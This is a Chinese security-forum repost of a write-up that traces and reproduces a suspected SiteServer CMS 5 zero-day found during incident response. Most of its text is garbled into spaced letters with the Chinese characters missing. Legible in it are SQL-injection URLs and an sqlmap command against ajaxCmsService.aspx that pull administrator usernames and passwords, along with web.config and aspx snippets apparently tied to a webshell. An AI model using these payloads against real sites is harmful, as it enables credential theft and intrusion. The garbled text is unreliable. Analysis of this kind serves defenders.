设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 护网 [16058] 2020-11-06_溯源复现SiteServer5疑似在野0day ...
返回列表 发新帖
查看: 7|回复: 0

[16058] 2020-11-06_溯源复现SiteServer5疑似在野0day

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-54

积分

管理员

积分
-54
发表于 2025-1-18 17:55:40 | 显示全部楼层 |阅读模式
2020-11-06_溯源复现SiteServer5疑似在野0day S i t e S e r v e r 5 0 d a y L i t t l e T 1 g e r   F r e e B u f   2 0 2 0 - 1 1 - 0 6 w i n s e r v e r 2 0 0 8 S i t e S e r v e r 5 . 0 1 d a y 0 d a y 西 r e v i e w r e v i e w H I D S - a g e n t w e b s h e l l H I D S 9 9 , , I I S   L o g s q l w e b - l o g 访 , 访 , a j a x C m s S e r v i c e . a s p x , 使 p a y l o a d U s e r N a m e P a s s w o r d P a s s w o r d S a l t : w e b s h e l l w e b l o g p o s t u p l o a d w a f w a f w a f C M S 1 d a y 访 a s p x h t t p : / / w w w . x x x x . c n / S i t e S e r v e r / A j a x / a j a x C m s S e r v i c e . a s p x ? t y p e = G e t T i t l e s & p u b l i s h m e n t S y s t e m I d = 1 & n o d e I d = 1 & t i t l e = a % 2 7 , 0 ) % 2 0 % 3 E % 2 0 0 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 T O P % 2 0 2 % 2 0 U s e r n a m e % 2 0 f r o m % 2 0 b a i r o n g _ A d m i n i s t r a t o r - - h t t p : / / w w w . x x x x . c n / S i t e S e r v e r / A j a x / a j a x C m s S e r v i c e . a s p x ? t y p e = G e t T i t l e s & p u b l i s h m e n t S y s t e m I d = 1 & n o d e I d = 1 & t i t l e = a
w e b . c o n f i g w e b s h e l l l o g 访 4 0 3 , ,   , , , , , , , , 1 d a y 怀 0 d a y , , . W i n S e r v e r 2 0 0 8 _ R 2 _ e n t e r p r i s e _ a n d _ w e b _ w i t h _ s p 1 S P 1 . N E T   F r a m e w o r k 2 . 0 , C M S 4 . 0 . 4 . 5 I I S S i t e S e r v e r ; M s s q l 2 0 0 8 S i t e S e r v e r 5 . 1 . 1 5 5 . 0 , 5 . 1 D L L I L S p y w i n S e r v e r : e d 2 k : / / | f i l e | c n _ w i n d o w s _ s e r v e r _ 2 0 0 8 _ r 2 _ s t a n d a r d _ e n t e r p r i s e _ d a t a c e n t e r _ a n d _ w e b _ w i t h _ s p 1 _ v l _ b u i l d _ x 6 4 _ d v d _ 6 1 7 3 9 6 . i s o | 3 3 6 8 9 6 2 0 4 8 | 7 C 2 1 0 C A C 3 7 A 0 5 F 4 5 9 7 5 8 B C C 1 F 4 4 7 8 F 9 E | / . N E T   F r a m e w o r k 4 . 0 :   h t t p s : / / w w w . m i c r o s o f t . c o m / e n - u s / d o w n l o a d / d e t a i l s . a s p x ? i d = 1 7 8 5 1 . N E T   F r a m e w o r k 4 . 5 :   h t t p s : / / d o w n l o a d . m i c r o s o f t . c o m / d o w n l o a d / E / 2 / 1 / E 2 1 6 4 4 B 5 - 2 D F 2 - 4 7 C 2 - 9 1 B D - 6 3 C 5 6 0 4 2 7 9 0 0 / N D P 4 5 2 - K B 2 9 0 1 9 0 7 - x 8 6 - x 6 4 - A l l O S - E N U . e x e S i t e S e r v e r 5 . 1 . 1 5 :   h t t p s : / / c o d e l o a d . g i t h u b . c o m / s i t e s e r v e r / c m s / z i p / s i t e s e r v e r - v 5 . 0 . 1 5 a j a x C m s S e r v i c e . a s p x d l l I L S p y d l l p a y l o a d u n i o n   s e l e c t : s q l m a p - p a y l o a d : s i t e s e r v e r 访 s i t e s e r v e r < s y s t e m . w e b S e r v e r > < h a n d l e r s   a c c e s s P o l i c y = " R e a d , W r i t e "   / > < / s y s t e m . w e b S e r v e r > / / w e b s h e l l + w e b . c o n f i g w e b . c o n f i g w e b . c o n f i g < % @   P a g e   l a n g u a g e = " c # "   t r a c e = " F a l s e "   e n a b l e V i e w S t a t e = " F a l s e "   I n h e r i t s = " S i t e S e r v e r . B a c k g r o u n d P a g e s . A j a x . A j a x C m s S e r v i c e "   % > t y p e = G e t T i t l e s & p u b l i s h m e n t S y s t e m I d = 1 & n o d e I d = 1 & t i t l e = a % 2 7 , 0 ) % 2 0 % 3 E % 2 0 0 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 T O P % 2 0 1 % 2 0 P a s s w o r d % 2 0 f r o m % 2 0 b a i r o n g _ A d m i n i s t r a t o r - - % 2 0     / / p a y l o a d G e t I n s t r ( C o l u m N a m e =   T i t l e ; i n S t r = a ' , 0 )   >   0   u n i o n   s e l e c t   T O P   1   P a s s w o r d   f r o m   b a i r o n g _ A d m i n i s t r a t o r - -   ) G e t I n s t r i n S t r   =   C H A R I N D E X ( ' a ' , 0 )   >   0   u n i o n   s e l e c t   T O P   1   P a s s w o r d   f r o m   b a i r o n g _ A d m i n i s t r a t o r - -   ) ' ,   { c o l u m n N a m e } )   >   0 s q l m a p   - u   " h t t p : / / 1 9 8 . 1 8 . 9 3 . 1 5 4 / S i t e S e r v e r / A j a x / a j a x C m s S e r v i c e . a s p x ? t y p e = G e t T i t l e s & p u b l i s h m e n t S y s t e m I d = 1 & n o d e I d = 1 & t i t l e = a % 2 7 , 0 ) % 2 0 % 3 E % 2 0 0 % 2 0 "
s q l 使 O R M 访 , , : 1 .   2 .   a d m i n 3 .   s i t e s e r v e r 7 . 0 d l l r e s t f u l - a p i
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-2-3 04:02 , Processed in 0.603643 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表